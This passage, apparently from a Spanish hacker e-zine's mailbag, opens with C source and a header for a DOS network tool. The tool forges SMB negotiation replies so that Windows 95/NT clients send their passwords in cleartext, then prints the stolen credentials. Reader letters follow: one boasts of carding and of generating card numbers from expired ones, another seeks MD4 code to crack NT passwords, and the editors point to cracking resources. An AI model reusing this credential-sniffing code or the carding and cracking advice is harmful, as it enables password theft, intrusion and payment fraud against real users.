105; XmitECB.ECBISR =3d TXCompleteESR; XmitECB.Frag1Len =3d 105; XmitECB.BoardNum =3d BoardNum; XmitECB.FragCnt =3d 1; XmitECB.NxtECB =3d (void far *) 0; XmitECB.PreECB =3d (void far *) 0; ECBData->version=3d0x45; ECBData->type=3d0x00; ECBData->length=3d0x6900; // Must byte-swap all words ECBData->identification=3d0xEEEE; // Should be ignored since no fragging ECBData->flags1=3d0x0040; ECBData->ttl=3d0x80; ECBData->protocol=3d0x06; ECBData->window=3d0x5221; ECBData->dataOffset=3d0x50; ECBData->flags2=3d0x18; ECBData->pad1=3d0x00; ECBData->nbtype=3d0x00; ECBData->nbflags=3d0x00; ECBData->nblength=3d0x4100; // Setup the ECB data for a raw send. We're building the SMB packet to spoof // client into sending their password clear text on the wire. Most of the // information was taken from an SMB client accessing our local SAMBA server ECBData->x.RAW.buf[0]=3d0xff; ECBData->x.RAW.buf[1]=3d0x53; ECBData->x.RAW.buf[2]=3d0x4d; ECBData->x.RAW.buf[3]=3d0x42; ECBData->x.RAW.buf[4]=3d0x72; ECBData->x.RAW.buf[5]=3d0x00; ECBData->x.RAW.buf[6]=3d0x00; ECBData->x.RAW.buf[7]=3d0x00; ECBData->x.RAW.buf[8]=3d0x00; ECBData->x.RAW.buf[9]=3d0x81; ECBData->x.RAW.buf[10]=3d0x00; ECBData->x.RAW.buf[11]=3d0x00; ECBData->x.RAW.buf[12]=3d0x00; ECBData->x.RAW.buf[13]=3d0x00; ECBData->x.RAW.buf[14]=3d0x00; ECBData->x.RAW.buf[15]=3d0x00; ECBData->x.RAW.buf[16]=3d0x00; ECBData->x.RAW.buf[17]=3d0x00; ECBData->x.RAW.buf[18]=3d0x00; ECBData->x.RAW.buf[19]=3d0x00; ECBData->x.RAW.buf[20]=3d0x00; ECBData->x.RAW.buf[21]=3d0x00; ECBData->x.RAW.buf[22]=3d0x00; ECBData->x.RAW.buf[23]=3d0x00; // We need the Tree ID, Process ID, and Mux ID from the look ahead buffer // since these fields change on every connection //ECBData->x.RAW.buf[24]=3d0x00; Tree ID //ECBData->x.RAW.buf[25]=3d0x00; //ECBData->x.RAW.buf[26]=3d0xbf; Process ID //ECBData->x.RAW.buf[27]=3d0x1b; ECBData->x.RAW.buf[28]=3d0x00; ECBData->x.RAW.buf[29]=3d0x00; //ECBData->x.RAW.buf[30]=3d0x81; Mux ID //ECBData->x.RAW.buf[31]=3d0x40; ECBData->x.RAW.buf[32]=3d0x0D; ECBData->x.RAW.buf[33]=3d0x02; // Dialect 2 for 95 ws, Dialect 5 for NT ECBData->x.RAW.buf[34]=3d0x00; ECBData->x.RAW.buf[35]=3d0x01; ECBData->x.RAW.buf[36]=3d0x00; ECBData->x.RAW.buf[37]=3d0x04; ECBData->x.RAW.buf[38]=3d0x11; ECBData->x.RAW.buf[39]=3d0x02; ECBData->x.RAW.buf[40]=3d0x00; ECBData->x.RAW.buf[41]=3d0x01; ECBData->x.RAW.buf[42]=3d0x00; ECBData->x.RAW.buf[43]=3d0x03; ECBData->x.RAW.buf[44]=3d0x00; ECBData->x.RAW.buf[45]=3d0xB0; ECBData->x.RAW.buf[46]=3d0x8B; ECBData->x.RAW.buf[47]=3d0xA1; ECBData->x.RAW.buf[48]=3d0x00; ECBData->x.RAW.buf[49]=3d0x2B; ECBData->x.RAW.buf[50]=3d0x52; ECBData->x.RAW.buf[51]=3d0x5C; ECBData->x.RAW.buf[52]=3d0x22; ECBData->x.RAW.buf[53]=3d0xA4; ECBData->x.RAW.buf[54]=3d0x01; ECBData->x.RAW.buf[55]=3d0x00; ECBData->x.RAW.buf[56]=3d0x00; ECBData->x.RAW.buf[57]=3d0x00; ECBData->x.RAW.buf[58]=3d0x00; ECBData->x.RAW.buf[59]=3d0x00; ECBData->x.RAW.buf[60]=3d0x00; ECBData->x.RAW.buf[61]=3d0x00; ECBData->x.RAW.buf[62]=3d0x00; ECBData->x.RAW.buf[63]=3d0x00; ECBData->x.RAW.buf[64]=3d0x00; ECBData->x.RAW.buf[65]=3d0x00; ECBData->x.RAW.buf[66]=3d0x00; ECBData->x.RAW.buf[67]=3d0x00; ECBData->x.RAW.buf[68]=3d0x00; ECBData->x.RAW.buf[69]=3d0x00; ECBData->x.RAW.buf[70]=3d0x00; ECBData->x.RAW.buf[71]=3d0x00; ECBData->x.RAW.buf[72]=3d0x00; ECBData->x.RAW.buf[73]=3d0x00; ECBData->x.RAW.buf[74]=3d0x00; ECBData->x.RAW.buf[75]=3d0x00; ECBData->x.RAW.buf[76]=3d0x00; ECBData->x.RAW.buf[77]=3d0x00; ECBData->x.RAW.buf[78]=3d0x00; ECBData->x.RAW.buf[79]=3d0x00; ECBData->x.RAW.buf[80]=3d0x00; ECBData->x.RAW.buf[81]=3d0x00; ECBData->x.RAW.buf[82]=3d0x00; ECBData->x.RAW.buf[83]=3d0x00; ECBData->x.RAW.buf[84]=3d0x00; ECBData->x.RAW.buf[85]=3d0x00; ECBData->x.RAW.buf[86]=3d0x00; ECBData->x.RAW.buf[87]=3d0x00; ECBData->x.RAW.buf[88]=3d0x00; ECBData->x.RAW.buf[89]=3d0x00; ECBData->x.RAW.buf[90]=3d0x00; ECBData->x.RAW.buf[91]=3d0x00; ECBData->x.RAW.buf[92]=3d0x00; ECBData->x.RAW.buf[93]=3d0x00; ECBData->x.RAW.buf[94]=3d0x00; ECBData->x.RAW.buf[95]=3d0x00; ECBData->x.RAW.buf[96]=3d0x00; ECBData->x.RAW.buf[97]=3d0x00; ECBData->x.RAW.buf[98]=3d0x00; ECBData->x.RAW.buf[99]=3d0x00; ECBData->x.RAW.buf[100]=3d0x00; ECBData->x.RAW.buf[101]=3d0x00; ECBData->x.RAW.buf[102]=3d0x00; //last byte ECBData->x.RAW.buf[103]=3d0x01; // Setup some of the variables that we'll use later foundpw=3d0; sendOK=3d0; wstype=3d0; do { do { // Loop until someone hits a key or until we have a packet to process if(kbhit()) { printf("C2MyAzz: Exiting\n"); uninit(); exit(0); } } while (CurEntry =3d=3d 0); //Loop until we get a packet // Grab data out of packet to determine whether or not to proceed type =3d (u8) (((IPpac *)(Data[0].data))->x.SMB.FunctionCode); commandresp =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.cmdresp); // NT and 95 use different username / password combinations. Check // to see if the client is a 95 or NT workstation. Note that we're checking // to see if the workstation supports long filenames (0x3 =3d NT), or DOS // 8.3 only (0x0 =3d 95). This is an assumption based on observation. We // could use additional information in the packet to determine NT or 95.. if((((IPpac *)(Data[0].data))->x.SMB.Flags2) =3d=3d 0x3) wstype=3d1; // Looks like an NT Workstation else wstype=3d0; // Otherwise, a Windows 95 machine // If this is a SMB NEG PROT and this is a request, grab information // for the transmit ECB if((type =3d=3d 0x72) && (!(commandresp & 0x80))) { SourceAddress=3d(u32)(((IPpac *)(Data[0].data))->srcaddr); DestAddress=3d(u32)(((IPpac *)(Data[0].data))->destaddr); sourcePort=3d(u16)(((IPpac *)(Data[0].data))->srcport); destPort=3d(u16)(((IPpac *)(Data[0].data))->destport); seqNum=3d(u32)(((IPpac *)(Data[0].data))->seqnumber); ackNum=3d(u32)(((IPpac *)(Data[0].data))->acknumber); MuxID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.muxId); TreeID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.TreeID); ProcID =3d (u16) (((IPpac *)(Data[0].data))->x.SMB.ProcessID); pktlen =3d (u16) (((IPpac *)(Data[0].data))->length); memmove(&pid, &Data[0].pid, sizeof(PID)); memmove(&immAddr, &Data[0].immAddr, sizeof(immAddr)); memmove(XmitECB.ImmAddr, (void *) immAddr, 6); memmove(&XmitECB.ProtocolID, &pid, sizeof(PID)); *((u32 *)(&(ECBData->destaddr)))=3dSourceAddress; *((u32 *)(&(ECBData->srcaddr)))=3dDestAddress; *((u16 *)(&(ECBData->destport)))=3dsourcePort; *((u16 *)(&(ECBData->srcport)))=3ddestPort; *((u32 *)(&(ECBData->seqnumber)))=3dackNum; *((u16 *)(&(ECBData->x.RAW.buf[24])))=3dTreeID; *((u16 *)(&(ECBData->x.RAW.buf[26])))=3dProcID; *((u16 *)(&(ECBData->x.RAW.buf[30])))=3dMuxID; if(wstype =3d=3d 1) ECBData->x.RAW.buf[33]=3d0x05; //NT Workstation uses dialect 5 else ECBData->x.RAW.buf[33]=3d0x02; //95 Workstation uses dialect 2 // Need to calculate the IP and TCP headers. Start by setting up for // grabbing the sequence numbers of the previous packets, and ca seqNum=3dflipbyte32(seqNum); pktlen=3dflipbyte16(pktlen); // Ack number is last packet + data - header nextseqNum=3d(seqNum + pktlen - 40); nextseqNum=3dflipbyte32(nextseqNum); *((u32 *)(&(ECBData->acknumber)))=3dnextseqNum; seqNum=3dflipbyte32(seqNum); pktlen=3dflipbyte16(pktlen); // Calculate the IP and TCP checksums // Initially set the CRCs to zero ECBData->headerCRC=3d0x0000; ECBData->tcpCRC=3d0x0000; sum=3d0; // Start by adding up all the bytes in IP header ptr=3d(u16 *)ECBData; for(j=3d0;j<10;j++) sum+=3d(ptr[j]); // Add any overflow into the sum sum=3d(sum>>16)+(sum & 0xffff); sum+=3d(sum>>16); // Take 1's complement ECBData->headerCRC=3d~sum; // Calculate the TCP Checksum // Note that we need to first create a pseudo-header for // use in the TCP checksum. For more information, see page // 186 of "Internetworking with TCP/IP" by Comer sum=3d0; // Clear sum from last calculation sum+=3dptr[6]; // Add up the IP address sum+=3dptr[7]; sum+=3dptr[8]; sum+=3dptr[9]; sum+=3d0x0600; // Add in the protocol ID for TCP in IP sum+=3d0x5400; // Add in the length of TCP data for(j=3d10;j<74;j++) // Add up the bytes in the ECB sum+=3d(ptr[j]); // Add any overflow into the sum sum=3d(sum>>16)+(sum & 0xffff); sum+=3d(sum>>16); // Take 1's complement ECBData->tcpCRC=3d~sum; if((foundpw =3d=3d 0) && (sendOK =3d=3d 0)) { // SendOK is reset after the packet is sent sendOK=3d1; // Pass the ECB to LSL for a raw send _asm { push es push ds mov ax, SEG XmitECB mov es, ax ;Whew! Lots of work just to get mov si, OFFSET XmitECB ;a packet on the wire. mov bx, 0ch ;Let's transmit this tiresome hag call far ptr LSLProtocolSupportEntryPt mov ComCode, ax pop ds pop es } } else foundpw=3d0; } // End of packet send routine // If we've received the client's password, display it on the screen if(type =3d=3d 0x73) { memmove(password, ((IPpac*)(Data[0].data))->x.USERPWNT.password, 32); memmove(username, ((IPpac*)(Data[0].data))->x.USERPW95.username, 15); pwlen =3d (u8) (((IPpac *)(Data[0].data))->x.USERPWNT.pwlength); // Since the password could be null, check to see if it appears // to be a valid password. Is the first character of the password // a valid ASCII character? if((password[0] >=3d 0x21) && (password[0] <=3d 0x5D)) { // If we spoof every packet, we won't connect to IPC to find the // shares of the domain. By spoofing every other packet, we'll let // the connection go through after a retry. This approach will // present the user with an error screen after attempting to connect // to the doamin, but if the user retries, we'll backoff and let // the user through foundpw=3d1; if(wstype =3d=3d 1) printf("User %s password is %s\n",&password[strlen(password)+1], password); else { // Need to null terminate the strings password[23]=3d0x00; username[15]=3d0x00; printf("User %s password is %s\n", username, password); } } } // End of password display routine // Now that we've processed the packet, clear the buffer of the processed // packet. Note that we're disabling interrupts because we might // get stomped with a new packet while we're clearing out the old packet _disable(); memmove(Data, &Data[1],(sizeof(Data) - sizeof(IPInfo))); CurEntry--; _enable(); } while (1); } ------------ FIN ------------------------------------------------------------- Ahora te pongo el .h ------------ Codigo Fuente --------------------------------------------------- // // // #define flipbyte32( x ) ((u32) \ ((((u32)(x) & 0x000000FFL) << 24) | \ (((u32)(x) & 0x0000FF00L) << 8) | \ (((u32)(x) & 0x00FF0000L) >> 8) | \ (((u32)(x) & 0xFF000000L) >> 24))) #define flipbyte16( x ) ((u16) \ ((((u16)(x) & 0x00FF) << 8) | \ (((u16)(x) & 0xFF00) >> 8))) typedef signed char s8; typedef unsigned char u8; typedef unsigned int u16; typedef long unsigned int u32; typedef struct { u32 lo; u32 hi; } u64; typedef struct { u8 addr [8]; } Addr; typedef struct { u8 ID[6]; } PID; typedef u32 ProtocolNumber; typedef enum { ODI_SUCCESS =3d 0, ODI_OUT_OF_RESOURCES =3d -119, ODI_NO_MORE_ITEMS =3d -122, ODI_FAIL =3d -124 } ODIStat; typedef enum { FIRST_MUST, FIRST_NEXT, LOAD_DEPENDS, LAST_NEXT, LAST_MUST, } CHNPOS; typedef struct { u8 version; u8 type; u16 length; u16 identification; u16 flags1; u8 ttl; u8 protocol; u16 headerCRC; u32 srcaddr; u32 destaddr; //Start TCP Header u16 srcport; u16 destport; u32 seqnumber; u32 acknumber; u8 dataOffset; u8 flags2; u16 window; u16 tcpCRC; u16 pad1; //Start NB Header u8 nbtype; u8 nbflags; u16 nblength; union { struct { u8 Reserved0; u8 IDString[3]; u8 FunctionCode; u8 Reserved1[4]; u8 Flags1; u16 Flags2; u8 Reserved2[12]; u16 TreeID; u16 ProcessID; u16 Reserved3; u16 muxId; } SMB; struct { u8 buf[32]; } RAW; struct { u8 reserved1[9]; u8 cmdresp; u8 reserved[43]; u8 pwlength; u8 reserved2; u8 password[32]; }USERPWNT; struct { u8 reserved1[9]; u8 cmdresp; u8 reserved[43]; u8 pwlength; u8 reserved2; u8 password[24]; u8 username[16]; }USERPW95; } x; } IPpac; // template for Info Block typedef u32 Func; typedef struct { void (_far * LSLAPI )(); void (_far * GSAPI )(); void (_far * MLIDAPI)(); } InfoBlock; // template for info copied from IP packet typedef struct { u8 immAddr[6]; u8 type; u16 size; PID pid; char data[1500]; } IPInfo; typedef struct ECBs { void _far * NxtECB; void _far * PreECB; u16 Status; void (_far * ECBISR)(); u16 ProtocolNum; u8 ProtocolID[6]; u16 BoardNum; u8 ImmAddr[6]; u8 ECBDrvrWkSpace[4]; u16 ECBPrtclWkSpace[4]; u16 DataLen; u16 FragCnt; u8 _far * Frag1Addr; u16 Frag1Len; } EventCB; typedef struct { u8 _far * MediaHdr; // 4 u8 _far * DataPtr; // 4 u16 DataLen; // 2 PID ProtocolID; // 6 u16 BoardNum; // 2 u16 DataSize; // 2 PID ImmAddr; // 6 u16 PacAttrib; // 2 u16 DestType; // 2 u16 StartOffset; // 2 u8 PriorityLvl; // 1 u8 Reserved; // 1 } LookAhead; typedef struct RxChainNode { u32 nextlink; // 4 u16 boardnum; // 2 u16 position; // 2 void (_far _loadds * ISR)(); // 4 void (_far * ControlEntryPt)(); // 4 u16 StackID; // 2 u16 PacFilterMsk; // 2 u32 Reserved; // 4 } RxNode; // 24 total typedef struct { u8 cmajver; u8 cminver; u32 longname; u32 shortname; u8 pmajver; u8 pminver; u8 reserved[16]; } configtbl; typedef struct { u8 majver; u8 minver; u16 ctr; u32 mask; u32 txpac; u32 rxpac; u32 nopac; u16 cusctr; } stattbl; ------------ FIN ------------------------------------------------------------- Bueno os dejo, por hoy, si por alguna casualidad un dia me apetece, mandare otro texto del nbtstat, explicandolo que protocolos hay que tener instalados, etc. ad10. P.D. Por problemas tecnicos hemos tenido que quitar la pagina, por lo cual estamos buscando nuevo server, aunque seguro que cogamos un dominio propio. Ya que para septiembre cambianos totalmente la pagina. {CyBoRg} -thPrOpHeT- SHG Security Group <------> [ Lastima lo del web y esperamos oir de vosotros pronto y a ver si te animas y nos escribes algo ;-) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Angel" Subject: Hola Estoy realizando un proyecto sobre virus que explicara como funcionan, con todo detalle en todas las plataformas existentes, os agradeceria cualquier tipo de informacion al respecto (en espa¤ol), si teneis algo, sea lo que sea, por favor mandarmelo a: r9r99@xxxxxxxxxxxxxx Muchas gracias. En cuanto lo tenga terminado os lo enviare por si quereis publicarlo. <------> [ Pasate por nuestra seccion de VIRUS, que te sera muy util, y ya sabes estamos esperando tu articulo de virus. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Usuari Escombra To: jjf_team@usa.net Subject: quiero colaborar Holas... me encanta vuestro e-zine... especialmete el 3 y el 4... porque el 1 es... como lo diriamos... un poco verde... pero de buen rollo..! Os escribo desde Barcelona.. (Spain) jajaja... pq aqui el tema esta muy candente... mi seudonimo es NoFace aunque este es nuevo ya que antes yo me hacia llamr NEXUS... sip uno de tantos pero quizas uno de los primeros... Tengo alguna experiencia en hackear sistemas Unix... y soy especialista en MACINTOSH... en eso no hay quien me gane aunque no pude superar el reto de Apple para hackear su pagina... me preguntaba si podria formar parte en la revista... Ah.. domino bastante de Carding algo me he sacado con las Visas y poseo el secreto de generar numeros con PELAS a partir de algun numero ya caducado.. me lo ensenyo un coleguilla que controla mucho... Me ofrezco a redactar todo tipo de articulos... de tema que sea escepto de Telefonia que poseo un conocmiento limitado... Opino que el Hack es uan forma de vida y como no una forma de pensar... Gracias y espero que me escribais. Diciendome si colaboro o no..? OK Venga animo y seguid asi que soys cojonudos e id con cuidado... EL GRAN HERMANO OS OBSERVA jejeje.. bueno os escribo desde la universidad POMPEU FABRA.. jeje infiltrado... jejej.... A ver si no me pillan un dia de estos... una vez me pillaron Intentando hackaer el server central... y me quede con el admin... jeje INGENIERIA SOCIAL... - no, mi crnet.. mmmm me lo he dejado en casa... _ no puedes estar aqui sin carnet... por cierto que haces.. ?? _ Nada... nada... _ Fuera.. _ y tu quien eres...?? _ el admin.. (cara de superioridad) _ A si? pues ensenyame el carnet ... (jejeje) _ ahora voy a buscarlo... pa chulo yo... (NoFace desaparece.. jejeje) anda buscame Bueno SALUDOS....... HACK THE WORLD IS FUCK THE WORLD XnexusX@xxxxxxxxxxxxxx <---- Ismael del servidor.. jejeervidor.. jeje <------> [ Pues los mienbros de la revista son los componentes de - J.J.F. / HACKERS TEAM - y es un grupo cerrado. Pero por supuesto puedes escribir lo que quieras que nosotros te lo ponemos encantados :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: Manuel-el oso To: sambam@xxxxxxxxxxxxxx Subject: el indio piel roja.... La historia nos recuerda que en cierta ocasion el presidente de los Estados Unidos intento comprar el territorio ocupado por los indios. Para ello le hizo una proposicion al jefe indio "toro sentado". Y esta fue su respuesta: *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ CARTA DEL JEFE INDIO ¨Como se puede comprar o vender el firmamento, ni aun el calor de la tierra?. Dicha idea nos es desconocida. Si no somos due¤os de la frescura del aire ni del fulgor de las aguas ¨Como podrian ustedes comprarlos? Cada parcela de esta tierra es sagrada para mi pueblo. Cada brillante mata de pino, cada grano de arena de las playas, cada gota de rocio en los oscuros bosques, cada altozano y hasta el sonido de cada insecto es sagrado a la memoria y al pasado de mi pueblo. La savia que circula por las venas de los robles lleva consigo las memorias de los pieles rojas. Los muertos del hombre blanco olvidan su pais de origen cuando emprenden sus paseos por las estrellas; en cambio, nuestros muertos nunca pueden olvidar esa bondadosa tierra, puesto que es la madre de los pieles rojas. Somos parte de la tierra y asi mismo, ella es parte de nosotros. Las flores perfumadas son nuestras hermanas; el venado, el caballo, la gran guila; estos son nuestros hermanos. Las escarpadas pe¤as, los humedos prados, el calor del cuerpo del caballo y el hombre, todos pertenecemos a la misma familia. Por todo ello cuando el Gran Jefe de Washington nos envia el mensaje de que quiere comprar nuestras tierras dice que nos reservar un lugar en el que podamos vivir confortablemente entre nosotros. El se convertir en nuestro padre y nosotros en sus hijos. Por ello consideramos su oferta de comprar nuestras tierras. Ello no es facil, ya que esta tierra es sagrada para nosotros. El agua cristalina que corre por los rios y arroyuelos no es solamente agua, sino, tambien, representa la sangre de nuestros antepasados. Si le vendemos nuestra tierra deben recordar que es sagrada y a la vez deben ense¤ar a sus hijos que es sagrada y cada reflejo fantasmagorico en las claras aguas de los lagos cuenta los sucesos y memorias de las vidas de nuestras gentes. El murmullo del agua es la voz del padre de mi padre. Los rios son nuestros hermanos y sacian nuestra sed; son portadores de nuestras canoas y alimentan a nuestros hijos. Si les vendemos nuestras tierras, ustedes deben recordar y ense¤arles a sus hijos que los rios son nuestros hermanos y tambien lo son suyos y, por lo tanto, deben tratarlos con la misma dulzura con la que se trata a un hermano. Sabemos que el hombre blanco no comprende nuestro modo de vida. El no sabe distinguir entre un pedazo de tierra y otro, ya que es un extra¤o que llega de noche y toma de la tierra lo que necesita. La tierra no es su hermana, sino su enemiga, y una vez conquistada sigue su camino, dejando atras la tumba de sus padres sin importarle. Le secuestra la tierra a sus hijos. Tampoco le importa, tanto la tumba de sus padres como el patrimonio de sus hijos son olvidados. Trata a su madre, la tierra, y a su hermano, el firmamento, como objetos que se compran, se explotan y se venden como ovejas o piedras de colores. Su apetito devorar la tierra, dejando atras solo un desierto. No se, pero nuestro modo de vida es diferente al de ustedes. La sola visita de sus ciudades apenan los ojos del piel roja. Pero quiza sea por que el piel roja es un salvaje y no comprende nada. No existe un lugar tranquilo en las ciudades del hombre blanco, ni hay sitio donde escuchar como se abren las hojas de los arboles en primavera o como aletean los insectos. Pero quiza tambien esto debe ser porque soy un salvaje que no comprende nada. El ruido solo parece insultar nuestros oidos. Y despues de todo, ¨para que sirve la vida si el hombre no puede escuchar el grito solitario del chotacabras ni las discusiones nocturnas de las ranas al borde de un estanque?. Soy un piel roja y nada entiendo. Nosotros preferimos el suave susurro del viento sobre la superficie de un estanque, asi como el olor de ese mismo viento purificado por la lluvia del mediodia o perfumado con aromas de pinos. El aire tiene un valor inestimable para el piel roja, ya que todos los seres comparten un mismo aliento, la bestia, el arbol, el hombre, todos respiramos el mismo aire. El hombre blanco no parece consciente del aire que respira; como un moribundo que agoniza durante muchos dias es insensible al olor. Pero si les vendemos nuestras tierras, deben recordar que el aire nos es inestimable, que el aire comparte su espiritu con la vida que sostiene. El viento que dio a nuestros abuelos el primer soplo de vida tambien recibe sus ultimos suspiros. Y si les vendemos nuestras tierras, ustedes deben conservarlas como cosa aparte y sagrada, como un lugar donde hasta el hombre blanco pueda saborear el viento perfumado por las flores de las praderas. Por ello, consideramos su oferta de comprar nuestras tierras y si decidimos aceptarla yo pondre una condicion: el hombre blanco debe tratar a los animales de esta tierra como a sus hermanos. Soy un salvaje y no comprendo otro modo de vida. He visto a miles de bufalos pudrirse en las praderas, muertos a tiros por el hombre blanco desde un tren en marcha. Soy un salvaje y no comprendo como una maquina humeante puede importar mas que el bufalo, al que nosotros solo matamos para sobrevivir ¨Que seria del hombre sin los animales? Si todos fueran exterminados, el hombre moriria de una gran soledad espiritual; porque lo que suceda a los animales tambien le sucedera al hombre, todo va enlazado. Deben ense¤arles a sus hijos que el suelo que pisan son las cenizas de nuestros abuelos.Inculquen a sus hijos que la tierra esta enriquecida con las vidas de nuestros semejantes a fin que sepan respetarla. Ense¤en a sus hijos que nosotros hemos ense¤ado a los nuestros que la tierra es nuestra madre; y que todo lo que le ocurra a la tierra le ocurrira a los hijos de la tierra. Si los hombres escupen en el suelo, se escupen a si mismos. Esto sabemos: la tierra no pertenece al hombre; el hombre pertenece a la tierra. Esto sabemos: todo va enlazado, como la sangre que une una familia. Todo va enlazado. El hombre no tejio la trama de la vida; el solo es un hijo. Lo que hace con la trama se lo hace a si mismo. Ni siquiera el hombre blanco, cuyo Dios pasea y habla con el de amigo a amigo, queda exento del destino comun. Despues de todo quiza seamos hermanos. Ya veremos. Sabemos una cosa que quiza el hombre blanco descubra algun dia: nuestro Dios es el mismo Dios. Ustedes pueden pensar ahora que El les pertenece, lo mismo que desean que nuestras tierras les pertenezcan, pero no es asi. El es el Dios de los hombres y su compasion se comparte por igual entre el piel roja y el hombre blanco. Esta tierra tiene un valor inestimable para El, y si se da¤a se provocaria la ira del Creador. Tambien los blancos se extinguiran, quiza antes que las demas tribus. Contaminan sus lechos y una noche pereceran ahogados en sus propios residuos. Pero ustedes caminaran hacia su destruccion rodeados de gloria, inspirados por la fuerza de Dios que os trajo a esta tierra y que, por algun designio especial, les dio dominio sobre ella y sobre el piel roja. Ese destino es un misterio para nosotros, pues no entendemos por que se exterminan los bufalos, se doman los caballos salvajes, se saturan los rincones secretos de los bosques con el aliento de tantos hombres y se atiborra el paisaje de las exuberantes colinas con cables parlantes. ¨Donde esta el matorral? Destruido. ¨Donde esta el aguila? Desaparecio.Termina la vida y empieza la supervivencia. "Este mail esta echo con las ultimas neuronas de mi cerebro privilegiado, y debo mantenerlas por lo que no se volvera a leer ni a corregir las faltas ortograficas" Colaboracion por Pata. *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ *^*^ <------> [ hhhhuuumm interesante, pero, ¨ que es ? ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Tono" Subject: Info Me gustaria que me dijeseis las IP de la web de LEOWORLD ya que actualmente esta con otra IP de la que vosotros habeis puesto. Y tambien si vosotros haceis lo mismo qie me dijeseis las IP por las que soleis poner vuestra web. NOTA: si no cambiais la IP olvidad lo 2nd vuestra pagina es la mejor que he encontrado en espa¤ol , asi que no la jodais, y lo que mas me ha gustado ha sido el simbolo "phi" de la seccion de Crack. Stop..................... <------> [ ¨¨¨ La IP de LEOWORLD ???, y nosotros no cambiamos y si lo hacemos no te preocupes que te enteraras :) ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: default To: jjf_team@usa.net Subject: hola desde el peru Que tal amigos me parece que estan haciendo un buen trabajo pero diganme como seria posible que yo pudiera adquirir un ejemplar respuestas al hepe@xxxxxxxxxxxxxx <------> [ Thx pero logicamente en nuestro web oficial y en nuestros distribuidores oficiales. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: "Juan Carlos" Subject: ezine para Conde Vampiro y Mac Crack Bishop Bueno tios el ezine es una pasada, desde luego estoy aprendiendo un huevo y parte del otro. A pesar de que soy un newbie, tengo ganas de comenzar en esto del mundo hack. Estoy realizando un generador de password aleatorio y con diccionario para claves de NT 4. Estas estan encriptadas con hash MD4 y necesito el codigo fuente de este algoritmo. Tambien necesito saber algo mas de como atacar en condiciones las particiones NTFS por que los programas PWdump y tal... Son un poco fuleros o por lo menos las versiones que yo tengo, solo permiten ver los directorios inutiles donde no hay nada interesante K:( Por cierto solo hablais de sistemas UNIX/LINUX, y muchos servidores funcionan con la basurilla del Sr. Bill Gates. La verdad es que no tengo mucha idea y creo que no puedo ofrecer una opinion real, sobre los Bugs del NT. Pero a un asi lo tengo en casa y ultimamente casca bastante. Me gustaria saber algunas cosas: - Teneis una BBS hack por la zona centro... - Que version de LINUX me recomendais. - Teneis intercambio de correo sobre desarroyo de hw y sw para realizar :-) Buneo no se se conseguire realizar algo guapo para el NT, de todas formas segun avance os envio codigo fuente y algunas pruebas para que lo publiqueis en el ezine, tengo intencion de adjuntar todos los programas posibles para hakear el sistema virus NT. A por cierto ya os he dicho que soy un newbie, pero tego ganas de ayudaros y aprender, si necesitais algo sobre electronica, micros, etc... podeis contactar conmigo. <------> [ Pues muchas gracias, ya sabemos que el ezine se a dedicado mucho a Unix, pero eso no significa que no trabajemos con NT, mas adelante iremos poniendo cosillas :) Para pillar cosas buenas de NT, te recomendamos los siguientes urlïs : http://l0pht.com/ http://207.98.195.250/ (Rhino9) http://www.ntshop.net http://ciac.llnl.gov/ciac/ToolsUnixSig.html#Md4 Codigo del MD4 Por desgracia no contamos con BBS, sobre Linux depende lo que quieras hacer y por el momento no tenemos mailing list pero estamos en ello. Pues ya sabes envianoslo cuando lo tengas listo, tenemos ganas de verlo. ] <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> From: jaina7@xxxxxxxxxxxxxx (grieko) To: jjf_team@usa.net Subject: hola como estan saben su page esta muy bien pero baje un archivo que decia hackear page en espa¤ol pero nada estaba en ingles espero que pronto lo pongan en espa¤ol <------> [ Pues eso a sido un descuido del webmaster y ese documento no sera traducido por nosotros por lo que si alquien lo quiere traducir, pues ya sabe. ] 